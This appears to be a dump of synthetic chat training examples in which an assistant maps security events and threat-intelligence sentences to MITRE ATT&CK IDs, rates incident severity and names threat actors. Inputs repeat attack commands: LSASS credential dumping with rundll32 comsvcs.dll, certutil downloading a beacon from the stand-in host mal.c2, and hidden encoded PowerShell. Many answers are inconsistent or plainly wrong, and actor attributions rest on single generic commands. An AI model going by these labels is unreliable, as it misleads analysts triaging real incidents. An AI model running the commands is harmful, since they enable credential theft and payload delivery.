messages
listlengths
2
2
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1555 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.181.29.20", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"]...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: WhisperGate can overwrite sectors of a victim host's hard drive at periodic offsets.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561.001\", \"T1561\"]}", "role": "assi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-UX9VQQYX3P)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence, Impact, Privilege Escalation", "role": "user" }, { "con...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2378 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.175.223.31", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"technique...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-IPR99JP3GV)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Critical\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Kessel has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}", "role": "assi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-QBCZAMGH00)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"Extre...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: reg query HKCU /f password /t REG_SZ /s", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, , are suspicious.", "role": "user" }, { "content": "{\"tactics\": ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.37.48.126", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 527 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.103.224.191", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\",...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-WW8M4SWXEX)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Reconnaissance", "role": "user" }, { "con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2497 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-8KGRIJIASA)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence, Defense Evasion", "role": "user" }, { "content...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-URBEKOGCM0)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Reconnaissance, Exfiltration", "role": "user" }, { "content": "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-MTA5ADIZWN)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-EL09VSG7F5)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Execution, Persistence", "role": "user" }...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-E1AMFXAZPQ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Execution, Persistence", "role": "user" }, { "content...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.7.41.202", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.73.25.239", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0005\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2611 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-XCV05BGFJ5)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severi...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Frankenstein has uploaded and downloaded files to utilize additional plugins.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-ATQ9SCDHAB)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Lateral Movement", "role": "user" }, { "content": "{\"s...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-5A3Z7DKFI7)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Execution, Privilege Escalation, Discovery", "role": "user" }, ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2467 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.141.63.111", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniqu...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Sp...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1884 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 843 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2807 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"conf...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.86.55.52", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-J90EBTQKTK)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Persistence", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-O1255QIWZ7)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Initial Access", "role": "user" }, { "content"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.43.59.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-ESA05MVSRU)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Discovery, Collection", "role": "user" }, { "conten...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.124.39.166", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniqu...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-FAYYE4GYUO)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Reconnaissance", "role": "user" }, { "con...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 762 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.80.106.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniq...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may gather information about the victim's host hardware that can be used during targeting.", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1592\", \"T1592.001...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3517 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.110.218.240", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-XEX8CF0D0U)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"Cr...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1187\"]}", "role": "assistant...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Leviathan has exfiltrated data over its C2 channel.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: QakBot has the ability to use removable drives to spread through compromised networks.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0008\"], \"techniques\": [\"T1091\"]}", "role": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-FA6X1Y5EBC)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Collection, Defense Evasion", "role": "user" }, {...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3268 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confide...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2169 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.76.169.123", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1098....
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container.", "role": "user" }, { "content": "{\"t...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-52PF7VNL10)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"Ex...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.80.227.155", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Xbash can execute malicious JavaScript payloads on the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.007\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"Hi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-T76T27QBV6)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection, Execution, Command and Control", "role": "user" }...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Doki was executed through an open Docker daemon API port.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0003\"], \"techniques\": [\"T1133\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor newly executed processes that result from the execution of subscriptions ( spawning from the WmiPrvSe.exe WMI Provider Host process).", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA000...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: GravityRAT creates a scheduled task to ensure it is re-executed everyday.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053.005\", \"T1053\"]}"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.101.8.245", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2857 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-IAUIXGPNTF)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Critic...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.63.152.78", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-SIUPG06WRX)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Command and Control, Credential Access, Collection", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.64.165.36", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0002...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.97.191.119", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-NYSUOBYBLL)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Discovery, Impact, Credential Access", "role": "user" }, { "cont...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-4T4H71BHOU)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access, Discovery, Defense Evasion", "role": "user" }...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: BRONZE BUTLER has placed malware on file shares and given it the same name as legitimate documents on the share.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1080\"]}", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: In the event this is successful the malware will use the following path to store any dropped files: %COMMONPROGRAMFILES%\\services\\ In the event it is not successful, this alternative path will be used instead: %APPDAT...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confid...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.56.5.73", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Psylo has a command to conduct timestomping by setting a specified file’s timestamps to match those of a system file in the System32 directory.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-91900KH4CM)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact, Lateral Movement", "role": "user" }, { "content":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-4C0TR2BOOT)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for newly constructed containers that may deploy a container into an environment to facilitate execution or evade defenses.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0005\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-GNFX1T1DNJ)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"Cri...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: PS1 is distributed as a set of encrypted files and scripts.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-ST6NGRXXCV)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Impact, Discovery", "role": "user" }, { "con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 1925 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.13.229.224", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3184 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidence\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-W3YV9RWLIE)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-0IMJKAHGKB)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Impact, Defense Evasion, Exfiltration", "role": "user" }, { "conte...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: RCSession can launch itself from a hollowed svchost.exe process.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1055.012\", \"T1055\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-JFFP5QR81T)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"Extre...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-B1DPDLW7EN)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Comnie, first named by Sophos seemingly after the Windows LNK file name it created, is a custom malware family that is used in targeted attacks, and has been observed in the wild since at least April 2013", "role...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T11...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2007 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidenc...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.81.155.182", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0043...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...